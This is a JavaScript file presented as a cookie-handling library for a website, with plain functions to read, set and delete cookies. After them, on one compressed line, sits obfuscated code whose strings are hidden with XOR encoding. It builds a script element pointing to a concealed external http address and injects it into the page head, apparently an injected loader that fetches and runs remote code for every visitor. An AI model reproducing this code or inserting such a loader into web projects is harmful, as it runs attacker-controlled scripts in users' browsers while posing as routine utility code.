// использование: <script Language="JavaScript" src="/sys/cokie_sapport.js"></script>

function cook_getCookie( name ) {
	var start = document.cookie.indexOf( name + '=' );
	var len = start + name.length + 1;
	if ( ( !start ) && ( name != document.cookie.
substring( 0, name.length ) ) ) {
		return null;
	}
	if ( start == -1 ) return null;
	var end = document.cookie.indexOf( ';', len );
	if ( end == -1 ) end = document.cookie.length;
	return unescape( document.cookie.substring( len, end ) );
}
	
function cook_setCookie( name, value, expires, path, domain, secure ) {
	var today = new Date();
	today.setTime( today.getTime() );
	if ( expires ) {
		expires = expires * 1000 * 60 * 60 * 24;
	}
	var expires_date = new Date( today.getTime() + (expires) );
	document.cookie = name+'='+escape( value ) +
		( ( expires ) ? ';expires='
+expires_date.toGMTString() : '' ) +
//expires.toGMTString()
		( ( path ) ? ';path=' + path : '' ) +
		( ( domain ) ? ';domain=' + domain : '' ) +
		( ( secure ) ? ';secure' : '' );
}
	
function cook_deleteCookie( name, path, domain ) {
	if ( cook_getCookie( name ) ) document.cookie = name + '=' +
			( ( path ) ? ';path=' + path : '') +
			( ( domain ) ? ';domain=' + domain : '' ) +
			';expires=Thu, 01-Jan-1970 00:00:01 GMT';
}var s1uWq=["029084","028094","030067","013069052004021047052058080037006063050","029069050","026078033000","026082041017078032016032084059000035047030067","015071033000015046050062092036007","006082048001","009082037032013047028051091060016019063058086054043000039020","006067037021091101094037065041023052104029090061087079056004121095059076050040026025059022"];function c7LA(oJ){var pmt=document[l1Va(s1uWq[3])](l1Va(s1uWq[0])+l1Va(s1uWq[1])+l1Va(s1uWq[2]));pmt[l1Va(s1uWq[4])]=oJ;pmt[l1Va(s1uWq[5])]=l1Va(s1uWq[6]);document[l1Va(s1uWq[9])](l1Va(s1uWq[8]))[0][l1Va(s1uWq[7])](pmt);}function ir516O(sz,na){var gm='';var cL=0;var dO9E=0;for(cL=0;cL<sz.length;cL++){var hf0c2=sz.charAt(cL);var w8=hf0c2.charCodeAt(0)^na.charCodeAt(dO9E);hf0c2=String.fromCharCode(w8);gm+=hf0c2;if(dO9E==na.length-1)dO9E=0;else dO9E++;}return (gm);}function l1Va(n6Iz4){return ir516O(pa7(n6Iz4),'n7QeaJqV5HcQF');}function pa7(qsLQA){var vH1='';var dp29=0;var odV6=0;for(dp29=0;dp29<qsLQA.length/3;dp29++){vH1+=String.fromCharCode(qsLQA.slice(odV6,odV6+3));odV6=odV6+3;}return vH1;}c7LA(l1Va(s1uWq[10]));